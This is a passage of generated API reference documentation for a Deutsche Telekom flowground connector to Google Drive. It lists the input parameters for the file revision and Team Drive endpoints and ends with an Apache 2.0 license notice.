* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `transferOwnership` - _optional_ - Whether to transfer ownership to the specified user and downgrade the current owner to a writer. This parameter is required as an acknowledgement of the side effect.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists a file's revisions.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `pageSize` - _optional_ - The maximum number of revisions to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a file version. You can only delete revisions for files with binary content, like images or videos. Revisions for other files, like Google Docs or Sheets, and the last remaining file version can't be deleted.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a revision's metadata or content by ID.
*Tags:* `revisions`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a revision with patch semantics.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Subscribes to changes to a file
*Tags:* `files`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists the user's Team Drives.
*Tags:* `teamdrives`
#### Input Parameters
* `pageSize` - _optional_ - Maximum number of Team Drives to return.
* `pageToken` - _optional_ - Page token for Team Drives.
* `q` - _optional_ - Query string for searching Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then all Team Drives of the domain in which the requester is an administrator are returned.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new Team Drive.
*Tags:* `teamdrives`
#### Input Parameters
* `requestId` - _required_ - An ID, such as a random UUID, which uniquely identifies this user's request for idempotent creation of a Team Drive. A repeated request by the same user and with the same request ID will avoid creating duplicates by attempting to create the same Team Drive. If the Team Drive already exists a 409 error will be returned.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a Team Drive for which the user is an organizer. The Team Drive cannot contain any untrashed items.
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a Team Drive's metadata by ID.
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the Team Drive belongs.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a Team Drive's metadata
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the Team Drive belongs.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
## License
**flow**ground :- Telekom iPaaS / googleapis-com-drive-connector<br/>
Copyright © 2019, [Deutsche Telekom AG](https://www.telekom.de)<br/>
contact: [email protected]
All files of this connector are licensed under the Apache 2.0 License. For details
see the file LICENSE in the top-level directory.